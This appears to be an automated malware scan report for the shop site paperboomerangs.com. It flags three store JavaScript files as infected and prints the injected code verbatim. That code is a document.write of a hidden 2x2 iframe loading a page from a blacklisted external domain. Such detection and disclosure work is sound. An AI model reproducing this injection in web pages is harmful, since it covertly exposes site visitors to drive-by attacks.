Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=paperboomerangs.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.paperboomerangs.com/ | 200 OK Content-Length: 8315 Content-Type: text/html | clean |
http://paperboomerangs.com.p11.hostingprod.com/ystore/js/bookmark.js | 200 OK Content-Length: 624 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=1536848></iframe>');
var url = "http://www.paperboomerangs.com/"; var title = "PaperBoomerangs.Com"; function addToFavorites() { if (window.sidebar) { window.sidebar.addPanel(title, url,""); } else if (window.external) { window.external.AddFavorite(url,title) } else { alert("Sorry! Your browser doesn't support this function."); } } if (!window.sidebar && !window.external) { document.getElementById('bookmarkPage').style.display = 'none'; } Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=1536848></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=1536848 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=1536848> | ||
http://paperboomerangs.com.p11.hostingprod.com/ystore/js/newsletter-validation.js | 200 OK Content-Length: 1397 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=1536848></iframe>');
function nvalidateEmail(email) { var splitted = email.match("^(.+)@(.+)$"); if(splitted == null) return false; if(splitted[1] != null ) { var regexp_user=/^\"?[\w-_\.]*\"?$/; if(splitted[1].match(regexp_user) == null) return false; } if(splitted[2] != null) { var regexp_domain=/^[\w-\.]*\.[A ...[988 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=1536848></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=1536848 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=1536848> | ||
http://paperboomerangs.com.p11.hostingprod.com/ystore/js/tellfriend-jscript.js | 200 OK Content-Length: 5282 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=1536848></iframe>');
function sendToFriend(account,store,email){ var newwindow = "http://p.hostingprod.com/@" + escape(store) + "/tellafriend/tellfriend.php?url=" + escape(window.location) + "&email=" + escape(email) + "&store=" + escape(account) + "&itemname=" + escape(itemname); var popUpWin=0; if(popUpWin){ if(!popUpWin.closed) popUpWin.close(); } popUpWin ...[4013 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=1536848></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=1536848 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=1536848> | ||
http://l.yimg.com/a/lib/smbiz/store/yfc/js/0.4/loader.js?q=yhst-98402799979390&ts=1306495672&p=1&h=order.store.yahoo.net | 200 OK Content-Length: 34108 Content-Type: application/javascript | clean |
http://www.paperboomerangs.com/index.html | 200 OK Content-Length: 10924 Content-Type: text/html | clean |
http://l.yimg.com/a/ult/ylc_1.9.js | 200 OK Content-Length: 1957 Content-Type: application/javascript | clean |
http://l.yimg.com/a/lib/smbiz/store/csell/js/beacon-1.3.6.4.js | 200 OK Content-Length: 7216 Content-Type: application/javascript | clean |
http://l.yimg.com/a/lib/smbiz/store/csell/js/recs-1.3.2.2.js | 200 OK Content-Length: 13530 Content-Type: application/javascript | clean |
http://www.paperboomerangs.com/about-us.html | 200 OK Content-Length: 11664 Content-Type: text/html | clean |
http://www.paperboomerangs.com/privacypolicy.html | 200 OK Content-Length: 11569 Content-Type: text/html | clean |
http://www.paperboomerangs.com/contact-us.html | 200 OK Content-Length: 10671 Content-Type: text/html | clean |
http://www.paperboomerangs.com/info.html | 200 OK Content-Length: 10850 Content-Type: text/html | clean |
http://www.paperboomerangs.com/ind.html | 200 OK Content-Length: 11534 Content-Type: text/html | clean |
http://www.paperboomerangs.com/papers-and-tapes.html | 200 OK Content-Length: 13653 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: paperboomerangs.com
Result:
GET / HTTP/1.1
Host: paperboomerangs.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: paperboomerangs.com
Referer: http://www.google.com/search?q=paperboomerangs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: paperboomerangs.com
Referer: http://www.google.com/search?q=paperboomerangs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.